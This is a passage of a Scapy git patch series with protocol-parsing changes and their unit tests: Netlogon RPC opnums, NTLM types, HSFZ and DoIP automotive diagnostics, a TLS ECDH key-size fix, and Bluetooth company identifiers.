DceRpcOp(DsrGetDcNameEx_Request, DsrGetDcNameEx_Response), + 28: DceRpcOp(DsrGetSiteName_Request, DsrGetSiteName_Response), + 29: DceRpcOp(NetrLogonGetDomainInfo_Request, NetrLogonGetDomainInfo_Response), + 30: DceRpcOp(NetrServerPasswordSet2_Request, NetrServerPasswordSet2_Response), + 31: DceRpcOp(NetrServerPasswordGet_Request, NetrServerPasswordGet_Response), + 32: DceRpcOp(NetrLogonSendToSam_Request, NetrLogonSendToSam_Response), + 33: DceRpcOp(DsrAddressToSiteNamesW_Request, DsrAddressToSiteNamesW_Response), + 34: DceRpcOp(DsrGetDcNameEx2_Request, DsrGetDcNameEx2_Response), + 35: DceRpcOp( + NetrLogonGetTimeServiceParentDomain_Request, + NetrLogonGetTimeServiceParentDomain_Response, + ), + 36: DceRpcOp( + NetrEnumerateTrustedDomainsEx_Request, NetrEnumerateTrustedDomainsEx_Response + ), + 37: DceRpcOp(DsrAddressToSiteNamesExW_Request, DsrAddressToSiteNamesExW_Response), + 38: DceRpcOp(DsrGetDcSiteCoverageW_Request, DsrGetDcSiteCoverageW_Response), + 39: DceRpcOp(NetrLogonSamLogonEx_Request, NetrLogonSamLogonEx_Response), + 40: DceRpcOp(DsrEnumerateDomainTrusts_Request, DsrEnumerateDomainTrusts_Response), + 41: DceRpcOp( + DsrDeregisterDnsHostRecords_Request, DsrDeregisterDnsHostRecords_Response + ), + 42: DceRpcOp( + NetrServerTrustPasswordsGet_Request, NetrServerTrustPasswordsGet_Response + ), + 43: DceRpcOp( + DsrGetForestTrustInformation_Request, DsrGetForestTrustInformation_Response + ), + 44: DceRpcOp( + NetrGetForestTrustInformation_Request, NetrGetForestTrustInformation_Response + ), + 45: DceRpcOp( + NetrLogonSamLogonWithFlags_Request, NetrLogonSamLogonWithFlags_Response + ), + 46: DceRpcOp(NetrServerGetTrustInfo_Request, NetrServerGetTrustInfo_Response), + 47: DceRpcOp(OpnumUnused47_Request, OpnumUnused47_Response), + 48: DceRpcOp( + DsrUpdateReadOnlyServerDnsRecords_Request, + DsrUpdateReadOnlyServerDnsRecords_Response, + ), + 49: DceRpcOp( + NetrChainSetClientAttributes_Request, NetrChainSetClientAttributes_Response + ), + # 50: Opnum50NotUsedOnWire, + # 51: Opnum51NotUsedOnWire, + # 52: Opnum52NotUsedOnWire, + # 53: Opnum53NotUsedOnWire, + # 54: Opnum54NotUsedOnWire, + # 55: Opnum55NotUsedOnWire, + # 56: Opnum56NotUsedOnWire, + # 57: Opnum57NotUsedOnWire, + # 58: Opnum58NotUsedOnWire, + 59: DceRpcOp( + NetrServerAuthenticateKerberos_Request, NetrServerAuthenticateKerberos_Response + ), } register_dcerpc_interface( name="logon", diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index 775bf06240d..556faee0ea5 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -1965,7 +1965,7 @@ def _getSessionBaseKey(self, Context, ntlm): PNETLOGON_NETWORK_INFO, PNETLOGON_AUTHENTICATOR, NETLOGON_LOGON_IDENTITY_INFO, - RPC_UNICODE_STRING, + UNICODE_STRING, STRING, ) @@ -2007,14 +2007,14 @@ def _getSessionBaseKey(self, Context, ntlm): tag=6, value=PNETLOGON_NETWORK_INFO( Identity=NETLOGON_LOGON_IDENTITY_INFO( - LogonDomainName=RPC_UNICODE_STRING( + LogonDomainName=UNICODE_STRING( Buffer=ntlm.DomainName, ), ParameterControl=0x00002AE0, - UserName=RPC_UNICODE_STRING( + UserName=UNICODE_STRING( Buffer=ntlm.UserName, ), - Workstation=RPC_UNICODE_STRING( + Workstation=UNICODE_STRING( Buffer=ntlm.Workstation, ), ), From 449142a524ef2d24aecf390903aae47888073f2f Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 22 Aug 2025 08:09:13 +0200 Subject: [PATCH 1533/1632] Update PR template checklist --- .github/PULL_REQUEST_TEMPLATE.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/PULL_REQUEST_TEMPLATE.md b/.github/PULL_REQUEST_TEMPLATE.md index b76164695de..a7340ee6c6b 100644 --- a/.github/PULL_REQUEST_TEMPLATE.md +++ b/.github/PULL_REQUEST_TEMPLATE.md @@ -1,11 +1,11 @@ - + **Checklist:** - [ ] If you are new to Scapy: I have checked [CONTRIBUTING.md](https://github.com/secdev/scapy/blob/master/CONTRIBUTING.md) (esp. section submitting-pull-requests) - [ ] I squashed commits belonging together - [ ] I added unit tests or explained why they are not relevant -- [ ] I executed the regression tests (using `cd test && ./run_tests` or `tox`) +- [ ] I executed the regression tests (using `tox`) - [ ] If the PR is still not finished, please create a [Draft Pull Request](https://github.blog/2019-02-14-introducing-draft-pull-requests/) From 29433fc0c4a83472faf0eaa72a1ce466bf5f4966 Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Mon, 25 Aug 2025 20:08:31 +0200 Subject: [PATCH 1534/1632] Hsfz: Improve incorrect tester field naming. (#4818) Based on https://gitlab.com/LarsVoelker/wireshark/-/commit/3c4a5165a69d371d2abae1f271fbd806f9a31819, I improved the naming of the fields for this particular command. --- scapy/contrib/automotive/bmw/hsfz.py | 20 ++++++++++++++------ test/contrib/automotive/bmw/hsfz.uts | 4 ++-- 2 files changed, 16 insertions(+), 8 deletions(-) diff --git a/scapy/contrib/automotive/bmw/hsfz.py b/scapy/contrib/automotive/bmw/hsfz.py index 9758c078656..3316d7d136f 100644 --- a/scapy/contrib/automotive/bmw/hsfz.py +++ b/scapy/contrib/automotive/bmw/hsfz.py @@ -59,23 +59,31 @@ class HSFZ(Packet): IntField('length', None), ShortEnumField('control', 1, control_words), ConditionalField( - XByteField('source', 0), lambda p: p._hasaddrs()), + XByteField('source', 0), lambda p: p._has_srctgt_addrs()), ConditionalField( - XByteField('target', 0), lambda p: p._hasaddrs()), + XByteField('target', 0), lambda p: p._has_srctgt_addrs()), + ConditionalField( + XByteField('expected', 0), lambda p: p._has_exprecv_addrs()), + ConditionalField( + XByteField('received', 0), lambda p: p._has_exprecv_addrs()), ConditionalField( StrFixedLenField("identification_string", None, None, lambda p: p.length), lambda p: p._hasidstring()) ] - def _hasaddrs(self): + def _has_srctgt_addrs(self): # type: () -> bool # Address present in diagnostic_req_res, acknowledge_transfer, - # two byte length alive_check and incorrect_tester_address frames. + # and two byte length alive_check frames. return self.control == 0x01 or \ self.control == 0x02 or \ - (self.control == 0x12 and self.length == 2) or \ - self.control == 0x40 + (self.control == 0x12 and self.length == 2) + + def _has_exprecv_addrs(self): + # type: () -> bool + # Address present in incorrect_tester_address frames. + return self.control == 0x40 def _hasidstring(self): # type: () -> bool diff --git a/test/contrib/automotive/bmw/hsfz.uts b/test/contrib/automotive/bmw/hsfz.uts index c47edc4bdf5..9f199b38012 100644 --- a/test/contrib/automotive/bmw/hsfz.uts +++ b/test/contrib/automotive/bmw/hsfz.uts @@ -128,8 +128,8 @@ assert pkt.target == 0xf4 pkt = HSFZ(bytes.fromhex("000000020040fff4")) assert pkt.length == 2 assert pkt.control == 0x40 -assert pkt.source == 0xff -assert pkt.target == 0xf4 +assert pkt.expected == 0xff +assert pkt.received == 0xf4 = Test HSFZSocket From 3449fb74b1132aa3130b8ba27f59f6952c529785 Mon Sep 17 00:00:00 2001 From: dmillescamps <112382986+dmillescamps@users.noreply.github.com> Date: Wed, 27 Aug 2025 11:31:51 +0200 Subject: [PATCH 1535/1632] TLS kex fix for curves with size not multiple of 8 (#4827) Some EC curves have size not a multiple of 8, such as secp521r1. Because of this, it will crash during the Key Exchange with a 50% chance. Added a unit test that checks for the correct signature size, or will throw an exception before due to an "odd-length" hexadecimal string. --- scapy/layers/tls/keyexchange.py | 4 ++-- test/scapy/layers/tls/tls.uts | 21 +++++++++++++++++++++ 2 files changed, 23 insertions(+), 2 deletions(-) diff --git a/scapy/layers/tls/keyexchange.py b/scapy/layers/tls/keyexchange.py index 04da164d785..0f939b8358e 100644 --- a/scapy/layers/tls/keyexchange.py +++ b/scapy/layers/tls/keyexchange.py @@ -840,8 +840,8 @@ def fill_missing(self): x = pubkey.public_numbers().x y = pubkey.public_numbers().y self.ecdh_Yc = (b"\x04" + - pkcs_i2osp(x, pubkey.key_size // 8) + - pkcs_i2osp(y, pubkey.key_size // 8)) + pkcs_i2osp(x, (pubkey.key_size + 7) // 8) + + pkcs_i2osp(y, (pubkey.key_size + 7) // 8)) if s.client_kx_privkey and s.server_kx_pubkey: pms = s.client_kx_privkey.exchange(ec.ECDH(), s.server_kx_pubkey) diff --git a/test/scapy/layers/tls/tls.uts b/test/scapy/layers/tls/tls.uts index 7bf59bfeb31..0fff89f2f37 100644 --- a/test/scapy/layers/tls/tls.uts +++ b/test/scapy/layers/tls/tls.uts @@ -1002,6 +1002,27 @@ bytes(pkt) pkt.exchkeys.fill_missing() assert len(pkt.exchkeys.ecdh_Yc) == 32 += Building secp521r1 ecdh_Yc +~ libressl + +from scapy.layers.tls.record import TLS +from scapy.layers.tls.handshake import TLSClientKeyExchange + +cli_hello = bytes.fromhex('160303008f0100008b0303000027104268d53e923ce05aa04cb21b8fe33aed93266c00bd1f13ea6a6dad24000018c02cc02bc030c02fc024c023c028c027c00ac009c014c0130100004a00000013001100000e7777772e676f6f676c652e636f6d000500050100000000000a00080006001d00170019000b00020100000d00140012040105010201040305030203020206010603') +ser_hello = bytes.fromhex('16030300520200004e03035f9b52e4206fdc2410d1d482905c9b45a204641d9d856afb444f574e4752440120c4d1479e11a26edf0dbcb07e7a5f7d41c3d7b500015ff8c1ceed473bf457b193c02b000006000b0002010016030309270b0009230009200004cc308204c8308203b0a003020102021100b2fe3f66ac447c9f02000000007d9a03300d06092a864886f70d01010b05003042310b3009060355040613025553311e301c060355040a1315476f6f676c65205472757374205365727669636573311330110603550403130a47545320434120314f31301e170d3230313030363036343132305a170d3230313232393036343132305a3068310b3009060355040613025553311330110603550408130a43616c69666f726e6961311630140603550407130d4d6f756e7461696e205669657731133011060355040a130a476f6f676c65204c4c43311730150603550403130e7777772e676f6f676c652e636f6d3059301306072a8648ce3d020106082a8648ce3d030107034200046a7c4a9d35904b2b1b3f7c7326ff2adfb1bcb273b2a1a02003978dd1df8cecce5094e2309201fcd2294270ef359f4bdea177665d9e7321586682392ccc93ac89a382025c30820258300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070301300c0603551d130101ff04023000301d0603551d0e041604145d7ced1d850e92337bf7a0602ae3dd70668b895b301f0603551d2304183016801498d1f86e10ebcf9bec609f18901ba0eb7d09fd2b306806082b06010505070101045c305a302b06082b06010505073001861f687474703a2f2f6f6373702e706b692e676f6f672f677473316f31636f7265302b06082b06010505073002861f687474703a2f2f706b692e676f6f672f677372322f475453314f312e63727430190603551d1104123010820e7777772e676f6f676c652e636f6d30210603551d20041a30183008060667810c010202300c060a2b06010401d67902050330330603551d1f042c302a3028a026a0248622687474703a2f2f63726c2e706b692e676f6f672f475453314f31636f72652e63726c30820104060a2b06010401d6790204020481f50481f200f0007600b21e05cc8ba2cd8a204e8766f92bb98a2520676bdafa70e7b249532def8b905e00000174fcdb8af4000004030047304502207610c2e9b008b8ebf2f27a1e65631b8ae7534294c60f55a4c78c9e4927f56a23022100b61c72d94468cd6b4e376ea5d2ba7a6605a765c575f6a536b819a2d8031be4f7007600e712f2b0377e1a62fb8ec90c6184f1ea7b37cb561d11265bf3e0f34bf241546e00000174fcdb8af7000004030047304502204aae6373290fd01ad53e8ff9d6ef4f21d0badc0e65fef15c52c8f6af9468e12f022100c77dff6b266313b172ef8815beff3032d6058129baaa767361fe95e2c541ad81300d06092a864886f70d01010b05000382010100657bfcc7fd99ffed6f032bb056dc7712ec3ea437cf17750db8527ae0dcdd630f3ec4b2b95b7d482cc3a94082351117e45362319a842556954160d34c9019cc3cd312073ce540d031c4bf197b924a139b0e91bffc168a80c1641834445c509d6edf2daf8a247b72104b184968ef25cc260c75b28f470fc355477ac403da12701556e6e7550a38346f444238a154f1efb1a1a297eff39e35d76bc285599d19b0bd475d6f1daba94f1365dbc930041a79ca2df1bb724d53e4fb8831b8dc486522ee7d8eee0e1fea658352736fe949fcb233c08a3b9e14abc56a5556f9b469925cb5916ed058a4cf332c4c13a75ca83850773f9182ad95fadff51203c08e684df63b00044e3082044a30820332a003020102020d01e3b49aa18d8aa981256950b8300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d205232311330110603') +ser_cert = bytes.fromhex('16030309270b0009230009200004cc308204c8308203b0a003020102021100b2fe3f66ac447c9f02000000007d9a03300d06092a864886f70d01010b05003042310b3009060355040613025553311e301c060355040a1315476f6f676c65205472757374205365727669636573311330110603550403130a47545320434120314f31301e170d3230313030363036343132305a170d3230313232393036343132305a3068310b3009060355040613025553311330110603550408130a43616c69666f726e6961311630140603550407130d4d6f756e7461696e205669657731133011060355040a130a476f6f676c65204c4c43311730150603550403130e7777772e676f6f676c652e636f6d3059301306072a8648ce3d020106082a8648ce3d030107034200046a7c4a9d35904b2b1b3f7c7326ff2adfb1bcb273b2a1a02003978dd1df8cecce5094e2309201fcd2294270ef359f4bdea177665d9e7321586682392ccc93ac89a382025c30820258300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070301300c0603551d130101ff04023000301d0603551d0e041604145d7ced1d850e92337bf7a0602ae3dd70668b895b301f0603551d2304183016801498d1f86e10ebcf9bec609f18901ba0eb7d09fd2b306806082b06010505070101045c305a302b06082b06010505073001861f687474703a2f2f6f6373702e706b692e676f6f672f677473316f31636f7265302b06082b06010505073002861f687474703a2f2f706b692e676f6f672f677372322f475453314f312e63727430190603551d1104123010820e7777772e676f6f676c652e636f6d30210603551d20041a30183008060667810c010202300c060a2b06010401d67902050330330603551d1f042c302a3028a026a0248622687474703a2f2f63726c2e706b692e676f6f672f475453314f31636f72652e63726c30820104060a2b06010401d6790204020481f50481f200f0007600b21e05cc8ba2cd8a204e8766f92bb98a2520676bdafa70e7b249532def8b905e00000174fcdb8af4000004030047304502207610c2e9b008b8ebf2f27a1e65631b8ae7534294c60f55a4c78c9e4927f56a23022100b61c72d94468cd6b4e376ea5d2ba7a6605a765c575f6a536b819a2d8031be4f7007600e712f2b0377e1a62fb8ec90c6184f1ea7b37cb561d11265bf3e0f34bf241546e00000174fcdb8af7000004030047304502204aae6373290fd01ad53e8ff9d6ef4f21d0badc0e65fef15c52c8f6af9468e12f022100c77dff6b266313b172ef8815beff3032d6058129baaa767361fe95e2c541ad81300d06092a864886f70d01010b05000382010100657bfcc7fd99ffed6f032bb056dc7712ec3ea437cf17750db8527ae0dcdd630f3ec4b2b95b7d482cc3a94082351117e45362319a842556954160d34c9019cc3cd312073ce540d031c4bf197b924a139b0e91bffc168a80c1641834445c509d6edf2daf8a247b72104b184968ef25cc260c75b28f470fc355477ac403da12701556e6e7550a38346f444238a154f1efb1a1a297eff39e35d76bc285599d19b0bd475d6f1daba94f1365dbc930041a79ca2df1bb724d53e4fb8831b8dc486522ee7d8eee0e1fea658352736fe949fcb233c08a3b9e14abc56a5556f9b469925cb5916ed058a4cf332c4c13a75ca83850773f9182ad95fadff51203c08e684df63b00044e3082044a30820332a003020102020d01e3b49aa18d8aa981256950b8300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523231133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3137303631353030303034325a170d3231313231353030303034325a3042310b3009060355040613025553311e301c060355040a1315476f6f676c65205472757374205365727669636573311330110603550403130a47545320434120314f3130820122300d06092a864886f70d01010105000382010f003082010a0282010100d018cf45d48bcdd39ce440ef7eb4dd69211bc9cf3c8e4c75b90f3119843d9e3c29ef500d10936f0580809f2aa0bd124b02e13d9f581624fe309f0b747755931d4bf74de1928210f651ac0cc3b222940f346b981049e70b9d8339dd20c61c2defd1186165e7238320a82312ffd2247fd42fe7446a5b4dd75066b0af9e426305fbe01cc46361af9f6a33ff6297bd48d9d37c1467dc75dc2e69e8f86d7869d0b71005b8f131c23b24fd1a3374f823e0ec6b198a16c6e3cda4cd0bdbb3a4596038883bad1db9c68ca7531bfcbcd9a4abbcdd3c61d7931598ee81bd8fe264472040064ed7ac97e8b9c05912a1492523e4ed70342ca5b4637cf9a33d83d1cd6d24ac070203010001a38201333082012f300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030106082b0601050507030230120603551d130101ff040830060101ff020100301d0603551d0e0416041498d1f86e10ebcf9bec609f18901ba0eb7d09fd2b301f0603551d230418301680149be20757671c1ec06a06de59b49a2ddfdc19862e303506082b0601050507010104293027302506082b060105050730018619687474703a2f2f6f6373702e706b692e676f6f672f6773723230320603551d1f042b30293027a025a0238621687474703a2f2f63726c2e706b692e676f6f672f677372322f677372322e63726c303f0603551d20043830363034060667810c010202302a302806082b06010505070201161c68747470733a2f2f706b692e676f6f672f7265706f7369746f72792f300d06092a864886f70d01010b050003820101001a803e3679fbf32ea946377d5e541635aec74e0899febdd13469265266073d0aba49cb62f4f11a8efc114f68964c742bd367deb2a3aa058d844d4c20650fa596da0d16f86c3bdb6f0423886b3a6cc160bd689f718eee2d583407f0d554e98659fd7b5e0d2194f58cc9a8f8d8f2adcc0f1af39aa7a90427f9a3c9b0ff02786b61bac7352be856fa4fc31c0cedb63cb44beaedcce13cecdc0d8cd63e9bca42588bcc16211740bca2d666efdac4155bcd89aa9b0926e732d20d6e6720025b10b090099c0c1f9eadd83beaa1fc6ce8105c085219512a71bbac7ab5dd15ed2bc9082a2c8ab4a621ab63ffd7524950d089b7adf2affb50ae2fe1950df346ad9d9cf5ca') + +r1 = TLS(cli_hello) +r2 = TLS(ser_hello, tls_session=r1.tls_session.mirror()) +r3 = TLS(ser_cert, tls_session=r2.tls_session) + +s = r3.tls_session.mirror() +s.client_kx_ecdh_params = 25 +pkt = TLSClientKeyExchange(tls_session=s) +bytes(pkt) +pkt.exchkeys.fill_missing() +assert len(pkt.exchkeys.ecdh_Yc) == 133 # len(b'\x04') + ceil(521/8) * 2 + = Reading TLS test session - Extended master secret ~ libressl From 3363981813a8e968c20fa1d3641907daa83b37d6 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 1 Sep 2025 13:12:28 +0200 Subject: [PATCH 1536/1632] Add version field for DoIP and DoIP sockets (#4828) * Add version field for DoIP and DoIP sockets * Fix hashret of DoIP --- scapy/contrib/automotive/doip.py | 45 +++++++++++- test/contrib/automotive/doip.uts | 121 +++++++++++++++++++++++++++++-- 2 files changed, 156 insertions(+), 10 deletions(-) diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index 3fcbdc5dad4..acd58a811ba 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -120,8 +120,12 @@ class DoIP(Packet): 0x8003: "Diagnostic message NACK"} name = 'DoIP' fields_desc = [ - XByteField("protocol_version", 0x02), - XByteField("inverse_version", 0xFD), + XByteEnumField("protocol_version", 0x02, { + 0x01: "ISO13400_2010", 0x02: "ISO13400_2012", + 0x03: "ISO13400_2019", 0x04: "ISO13400_2019_AMD1"}), + XByteEnumField("inverse_version", 0xFD, { + 0xFE: "ISO13400_2010", 0xFD: "ISO13400_2012", + 0xFC: "ISO13400_2019", 0xFB: "ISO13400_2019_AMD1"}), XShortEnumField("payload_type", 0, payload_types), IntField("payload_length", None), ConditionalField(ByteEnumField("nack", 0, { @@ -239,7 +243,26 @@ def answers(self, other): def hashret(self): # type: () -> bytes - return bytes(self)[:3] + payload_type_mapping = { + 0x0000: b"\x01", + 0x0001: b"\x01", + 0x0002: b"\x01", + 0x0003: b"\x01", + 0x0004: b"\x01", + 0x0005: b"\x02", + 0x0006: b"\x02", + 0x0007: b"\x03", + 0x0008: b"\x03", + 0x4001: b"\x04", + 0x4002: b"\x04", + 0x4003: b"\x05", + 0x4004: b"\x05", + 0x8001: b"\x06", + 0x8002: b"\x06", + 0x8003: b"\x06", + } + + return payload_type_mapping.get(self.payload_type, b"\xff") def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes @@ -328,6 +351,10 @@ class DoIPSocket(DoIPSSLStreamSocket): connect via SSL/TLS :param context: Optional ssl.SSLContext object for initialization of ssl socket connections. + :param doip_version: DoIP protocol version to use, default is 2 (ISO 13400-2012) + :param enforce_doip_version: If true, the protocol_version field in each DoIP + packet to be sent, is always set to the value of + doip_version. Example: >>> socket = DoIPSocket("169.254.0.131") @@ -345,7 +372,9 @@ def __init__(self, activation_type=0, # type: int reserved_oem=b"", # type: bytes force_tls=False, # type: bool - context=None # type: Optional[ssl.SSLContext] + context=None, # type: Optional[ssl.SSLContext] + doip_version=2, # type: int + enforce_doip_version=False, # type: bool ): # type: (...) -> None self.ip = ip self.port = port @@ -357,6 +386,8 @@ def __init__(self, self.reserved_oem = reserved_oem self.force_tls = force_tls self.context = context + self.doip_version = doip_version + self.enforce_doip_version = enforce_doip_version try: self._init_socket() except Exception: @@ -448,6 +479,12 @@ def _activate_routing(self): # type: (...) -> int else: return -1 + def send(self, x): # type: (Packet) -> int + if self.enforce_doip_version and isinstance(x, DoIP): + x[DoIP].protocol_version = self.doip_version + x[DoIP].inverse_version = 0xFF - self.doip_version + return super().send(x) + class UDS_DoIPSocket(DoIPSocket): """ diff --git a/test/contrib/automotive/doip.uts b/test/contrib/automotive/doip.uts index b5963a0d817..f224e39a9c6 100644 --- a/test/contrib/automotive/doip.uts +++ b/test/contrib/automotive/doip.uts @@ -484,12 +484,14 @@ def server(): sock.bind(('127.0.0.1', 13400)) sock.listen(1) server_up.set() - connection, address = sock.accept() - sniff_up.wait(timeout=1) - for i in range(len(buffer)): - connection.send(buffer[i:i+1]) - time.sleep(0.01) - connection.close() + try: + connection, address = sock.accept() + sniff_up.wait(timeout=1) + for i in range(len(buffer)): + connection.send(buffer[i:i+1]) + time.sleep(0.01) + finally: + connection.close() finally: sock.close() @@ -503,6 +505,49 @@ pkts = sock.sniff(timeout=1, count=2, started_callback=sniff_up.set) server_thread.join(timeout=1) assert len(pkts) == 2 += Test DoIPSocket 2 enforce protocol_version +~ linux + +server_up = threading.Event() +sniff_up = threading.Event() +def server(): + buffer = b'\x02\xfd\x80\x02\x00\x00\x00\x05\x00\x00\x00\x00\x00\x02\xfd\x80\x01\x00\x00\x00\n\x10\x10\x0e\x80P\x03\x002\x01\xf4' + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + try: + sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + sock.bind(('127.0.0.1', 13400)) + sock.listen(1) + server_up.set() + connection, address = sock.accept() + try: + sniff_up.wait(timeout=1) + connection.send(buffer) + doip_sock = DoIPSSLStreamSocket(connection) + pkts = doip_sock.sniff(timeout=2, count=1) + doip_sock.send(pkts[0]) + finally: + connection.close() + finally: + sock.close() + + +server_thread = threading.Thread(target=server) +server_thread.start() +server_up.wait(timeout=1) +sock = DoIPSocket(activate_routing=False, doip_version=3, enforce_doip_version=True) + +pkts = sock.sniff(timeout=1, count=2, started_callback=sniff_up.set) +sock.send(DoIP(payload_type=0x8001, source_address=0xe80, target_address=0xe400) / UDS() / UDS_TP()) +pkts2 = sock.sniff(timeout=1, count=1) +server_thread.join(timeout=1) +assert len(pkts) == 2 +assert len(pkts2) == 1 +assert pkts2[0].protocol_version == 0x03 +assert pkts2[0].inverse_version == 0xfc +assert pkts2[0].payload_type == 0x8001 +assert pkts2[0].service == 0x3E + = Test DoIPSocket 3 server_up = threading.Event() @@ -813,3 +858,67 @@ pkts = sock.sniff(timeout=1, count=2, started_callback=sniff_up.set) server_tcp_thread.join(timeout=1) server_tls_thread.join(timeout=1) assert len(pkts) == 2 + += Test UDS_DualDoIPSslSocket6 force version 3 +~ broken_windows not_pypy + +server_tcp_up = threading.Event() +server_tls_up = threading.Event() +sniff_up = threading.Event() +def server_tls(): + context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) + _load_certificate_chain(context) + context.check_hostname = False + context.verify_mode = ssl.CERT_NONE + buffer = bytes.fromhex("03fc0006000000090e8011061000000000") + buffer += b'\x03\xfc\x80\x02\x00\x00\x00\x05\x00\x00\x00\x00\x00\x03\xfc\x80\x01\x00\x00\x00\n\x10\x10\x0e\x80P\x03\x002\x01\xf4' + sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) + sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + ssock = context.wrap_socket(sock) + try: + ssock.bind(('::1', 3496)) + ssock.listen(1) + server_tls_up.set() + connection, address = ssock.accept() + sniff_up.wait(timeout=1) + connection.send(buffer) + connection.close() + finally: + ssock.close() + +def server_tcp(): + buffer = bytes.fromhex("03fc0006000000090e8011060700000000") + sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) + try: + sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + sock.bind(('::1', 13400)) + sock.listen(1) + server_tcp_up.set() + connection, address = sock.accept() + connection.send(buffer) + connection.shutdown(socket.SHUT_RDWR) + connection.close() + finally: + sock.close() + + +server_tcp_thread = threading.Thread(target=server_tcp) +server_tcp_thread.start() +server_tcp_up.wait(timeout=1) +server_tls_thread = threading.Thread(target=server_tls) +server_tls_thread.start() +server_tls_up.wait(timeout=1) +context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) +context.check_hostname = False +context.verify_mode = ssl.CERT_NONE + +conf.debug_dissector = True + +sock = UDS_DoIPSocket(ip="::1", context=context, doip_version=3, enforce_doip_version=True) + +pkts = sock.sniff(timeout=1, count=2, started_callback=sniff_up.set) +server_tcp_thread.join(timeout=1) +server_tls_thread.join(timeout=1) +assert len(pkts) == 2 \ No newline at end of file From c445534f95b50058003bba14f70cbbd61a22c6a4 Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Wed, 3 Sep 2025 18:46:24 +0200 Subject: [PATCH 1537/1632] Bluetooth: Add ACL binding for HCI MON. (#4817) --- scapy/layers/bluetooth.py | 1 + 1 file changed, 1 insertion(+) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 844d77319d8..e2295952a05 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -2918,6 +2918,7 @@ class HCI_Mon_System_Note(Packet): bind_layers(HCI_Mon_Hdr, HCI_Mon_New_Index, opcode=0) bind_layers(HCI_Mon_Hdr, HCI_Command_Hdr, opcode=2) bind_layers(HCI_Mon_Hdr, HCI_Event_Hdr, opcode=3) +bind_layers(HCI_Mon_Hdr, HCI_ACL_Hdr, opcode=5) bind_layers(HCI_Mon_Hdr, HCI_Mon_Index_Info, opcode=10) bind_layers(HCI_Mon_Hdr, HCI_Mon_System_Note, opcode=12) From c91520d8cdb2d50eb39fda40327db1dcc9c46874 Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Wed, 3 Sep 2025 18:51:58 +0200 Subject: [PATCH 1538/1632] bluetooth: Add version and company identifiers to local version commands (#4716) * bluetooth: Add version and company identifiers to local version commands * Use base85 storage * Use company id in EIR_Manufacturer_Specific_Data * bluetoothids: Fix format. --------- Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/contrib/ibeacon.py | 2 +- scapy/data.py | 10 + scapy/layers/bluetooth.py | 33 +- scapy/libs/bluetoothids.py | 767 ++++++++++++++++++++++++++++++ scapy/tools/generate_bluetooth.py | 41 ++ test/scapy/layers/bluetooth.uts | 13 +- tox.ini | 4 +- 7 files changed, 856 insertions(+), 14 deletions(-) create mode 100644 scapy/libs/bluetoothids.py create mode 100644 scapy/tools/generate_bluetooth.py diff --git a/scapy/contrib/ibeacon.py b/scapy/contrib/ibeacon.py index af61cbe3d40..0326f915ef3 100644 --- a/scapy/contrib/ibeacon.py +++ b/scapy/contrib/ibeacon.py @@ -102,5 +102,5 @@ class IBeacon_Data(Packet): bind_layers(EIR_Manufacturer_Specific_Data, Apple_BLE_Frame, - company_id=APPLE_MFG) + company_identifier=APPLE_MFG) bind_layers(Apple_BLE_Submessage, IBeacon_Data, subtype=2) diff --git a/scapy/data.py b/scapy/data.py index a1a8e3c8316..b6bff82e9ab 100644 --- a/scapy/data.py +++ b/scapy/data.py @@ -574,6 +574,14 @@ def _process_data(fdesc): return manufdb +@scapy_data_cache("bluetoothids") +def load_bluetoothids(filename=None): + # type: (Optional[str]) -> Dict[int, str] + """Load Bluetooth IDs into the cache""" + from scapy.libs.bluetoothids import DATA + return cast(Dict[int, str], DATA) + + def select_path(directories, filename): # type: (List[str], str) -> Optional[str] """Find filename among several directories""" @@ -613,6 +621,8 @@ def select_path(directories, filename): ) ) +BLUETOOTH_CORE_COMPANY_IDENTIFIERS = load_bluetoothids() + ##################### # knowledge bases # diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index e2295952a05..0122559e5f0 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -21,7 +21,8 @@ from scapy.data import ( DLT_BLUETOOTH_HCI_H4, DLT_BLUETOOTH_HCI_H4_WITH_PHDR, - DLT_BLUETOOTH_LINUX_MONITOR + DLT_BLUETOOTH_LINUX_MONITOR, + BLUETOOTH_CORE_COMPANY_IDENTIFIERS ) from scapy.packet import bind_layers, Packet from scapy.fields import ( @@ -266,6 +267,24 @@ class HCI_PHDR_Hdr(Packet): 'extended_features', ] +_bluetooth_core_specification_versions = { + 0x00: '1.0b', + 0x01: 